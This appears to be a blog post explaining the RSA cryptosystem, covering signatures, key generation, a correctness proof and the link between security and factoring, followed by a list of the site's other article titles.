To implement signatures, the public-key cryptosystem must be implemented with trap-door one-way permutations (decrypted message could be encrypted with $E$) since the decryption algorithm will be applied to unenciphered messages. Bob can prove himself as real by computing his "signature":

$$S=D_B(M)$$

Note that any message could be deciphered, no matter whether it is a ciphered text or not. He then encrypts $S$ using $E_A$ (for security) and sends the result $E_A(S)$ to Alice. $M$ is not needed to be sent due to:

$$M=E_B(S)$$ (where $E_B$ is public)

A message-signature pair $(M, S)$ is made, and Bob cannot deny it since he used his $D_B$ to generate $S$, moreover; $M$ cannot be modified by Alice since she would have to create the corresponding signature $S$.

Therefore, the message-signature pair provide proof of Alice and Bob mutually.

RSA Overview

RSA applies the encryption process by using a public encryption key $(e, n)$ where $e, n \in +\mathbb{Z}$. the message $M$ should less than $n$. Then encrypt the message by the following formula and get $C$ as the ciphertext.

$$C=M^e\mod n$$

The ciphertext $C$ could be decrypted by raising it to power $d$ and modulo $n$, the following formula describes this process.

$$M=C^d \mod n$$

Hence, the encryption key is $(e, n)$, and the decryption key is $(d, n)$. And users make their encryption key public and keep the corresponding decryption key secret.

RSA Algorithm

In the previous section - RSA Overview, $e$ and $d$ need to be calculated as a pair. The way of choosing appropriate $e$ and $d$ is illustrated as follows. Randomly choose two large primes $p$ and $q$, and calculate the $n$ by the following formula, just guarantee that $n$ is larger than the message to be encrypted.

$$n=p\cdot q$$

Then find a $d$ which is relatively prime to $(p-1)\cdot(q-1)$.

$$\gcd[d, (p-1)\cdot(q-1)] = 1$$

And find the corresponding $e$ by calculating modulo inverse.

$$(e\cdot d) \equiv 1 \quad (\text{mod} (p-1)\cdot(q-1))$$

The preceding calculation: the greatest common divisor, could be calculated using Euclidean Algorithm in $\mathcal{O}(\log(N))$ time complexity. As for the inverse modulo, since we have known $d$ and $(p-1)\cdot(q-1)$, $e$ could be solved by applying Extend Euclidean Algorithm in $\mathcal{O}(\log(\min(d, (p-1)\cdot(q-1))))$ time complexity.

Until now, the key calculations are finished, and we can get $(e,n)$ and $(d,n)$ which are the encryption key (public) and decryption key (private).

How RSA works?

According to the Euler totient function [2], which returns a number of positive integers less than $n$ which are relatively prime to $n$. For example, $p$ is a prime, then

$$\phi(p)=p-1$$

Since the algorithm calculates $n=p\cdot q$. By elementary properties

$$\phi(n) = \phi(p) \cdot \phi(q) = (p-1)\cdot(q-1)$$

Since $d$ is relatively prime to $\phi(n)$ because of $\gcd[d, (p-1)\cdot(q-1)] = 1$, it has a multiplicative modulo inverse $e$ in the ring of integers modulo $\phi(n)$.

$$(e\cdot d) \equiv 1 \quad (\text{mod}\phi(n))$$

By the functionality of encryption and decryption

$$D(E(M)) \equiv (E(M))^d \equiv (M^e) ^d (\text{mod} n) = M^{e \cdot d} (\text{mod} n)$$ (encryption and decryption)

$$E(D(M)) \equiv (D(M))^e \equiv (M^d) ^e (\text{mod} n) = M^{e \cdot d} (\text{mod} n)$$ (signaturing)

and

$$M^{e \cdot d} \equiv M^{k \cdot \phi(n) + 1} (\text{mod} n)$$ (multiplicative modulo inverse)

by Euler and Fermat: for any integer $M$ which is relatively prime to $n$

$$M^{\phi(n)} \equiv 1 (\text{mod} n)$$

for all $M$ such that $p$ does not divide $M$

$$M^{p-1} \equiv 1 (\text{mod}p)$$

and since $(p-1)$ divides $\phi(n)$.

$$M^{k \cdot \phi(n) + 1} \equiv M (\text{mod}p)$$

Similarly, $(q-1)$ divides $\phi(n)$,

$$M^{k \cdot \phi(n) + 1} \equiv M (\text{mod}q)$$

Hence, for all $M$

$$M^{e \cdot d} \equiv M^{k \cdot \phi(n) + 1} \equiv M (\text{mod} n)$$

Then we proved that $M$ could reveal by decrypting using $(d, n)$.

RSA Reliability

All the mathematical variables used in the algorithm are $p, q, n, e, d, \phi(n)$. According to the process, only $(e, n)$ is public, and $p, q, d,\phi(n)$ is private, where $d$ is a component of the private key and should be kept secret.

To prove the reliability of RSA, we should figure out if there is an approach to determine $d$ by having only $n$ and $e$. Regarding the algorithm, we have

$$(e\cdot d) \equiv 1 \quad (\text{mod};\phi(n))$$

(means we need to determine $\phi(n)$ to calculate $d$, since we already know $e$)

$$\phi(n) = (p-1)(q-1)$$

(means we have to figure out $p$ and $q$, the randomly selected large prime)

$$n = p\cdot q$$

(means that the only way to get $p$ and $q$ is by factoring the large integer $n$)

Hence, the difficulty of factorizing a very large integer determines the reliability of the RSA algorithm. In other words, the more difficult it is to factorize a very large integer, the more reliable the RSA algorithm is.

In the paper, the author mentioned the fastest factoring algorithms, in which factoring a number seems to be much more difficult than determining whether it is prime or composite.

Conclusion

RSA is an implementation of public-key cryptography put forward by R.L. Rivest, A.Shamir, and L.Adleman in 1977, and it has a broad application nowadays. RSA is a relatively slow algorithm. Hence, it is not usually used to encrypt user data directly. Instead, it could establish a private session between two terminals by transmitting shared session keys for symmetric-key cryptography, which are then used for maintaining encryption–decryption.

References

Original Paper: Rivest, R. L., Shamir, A., & Adleman, L. (1983). A method for obtaining digital signatures and public-key cryptosystems. Communications of the ACM, 26(1), 96–99. https://doi.org/10.1145/357980.358017

Diffie, W., & Hellman, M. (1976). New directions in cryptography. IEEE Transactions on Information Theory, 22(6), 644–654. https://doi.org/10.1109/tit.1976.1055638
Niven, I., and Zuckerman, H.S. An Introduction to the Theory of Numbers. Wiley, New York, 1972.

The Aspires

An Introduction to Monotonic Stack

An Example

Solving Problems

POJ 3250 Bad Hair Day

POJ 3250 Bad Hair Day Description

LeetCode 42 Trapping Rain Water

Buffer Overflow Attack from the Ground-up III: Canary

Canary

By-passing the Canary

More Readings

Binary Indexed Tree: A Data Structure that Can Enhance Query Performance in Arrays

An Integer in Memory

Find the Right Most 1 in a Binary

Prefix Sum Array

Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection

Gadgets

Shellcode

Spawn a Shell

More Readings

Buffer Overflow Attack from the Ground-up I: Simple Overflow

Stack and Heap

How the stack works:

How the heap works:

Stack-based Buffer Overflow

EBP (Extended Base Pointer)

Endianness

More Readings

An Introduction to SHA256 Hash Extension Attack

The SHA-256 Padding Algorithm

SHA-256

Merkle–Damgård Length Extension Attack

An Introduction to Kafka and Samza for Stream Data Processing

Kafka as a Messaging System

Kafka the Publisher

Publish-subscribe (Pub/Sub) Pattern

Sample Kafka Producer (Publisher) Code

Samza the Subscriber

Samza APIs

High Level Steams API

Low Level Task API:

Explore the working of Samza

Explain Apache YARN to Beginners

More Readings on Play around with Kafka and Samza

An Introduction of NestJS, a Node.js web/app server framework.

Overall View

Before We Start: Boilerplate Code

Controllers

Services

Routing Mechanism and RESTful convention

Prefix Sum with HashMap: Time Complexity Optimization

LeetCode 560

Adopting Prefix Sum

Back to the Problem

Conclusion

Disjoint Set: City Connection Problem

City Connection Problem

Reading in Roads Info

How Disjoint Set works

Algorithms that Disjoint Set inspires

Neural Networks Series II: Forming Vision - How a Convolutional Neural Network Learns

Filtering & Kernels

Convolution

Fully Automatic on Parameter Optimizing

So How to Determine the Kernel?

Extracting Features and Poolings

Conclusion

Understanding Naïve Bayes Algorithm: Play with Probabilities

Bayes Theorem

Classes and Features

Priors

Conditional Probability

Posteriors

Integration

Implementation

Data Preprocessing

Calculate all of the conditional probabilities

Calculate all of the priors

Applying the Bayes Theorem

Result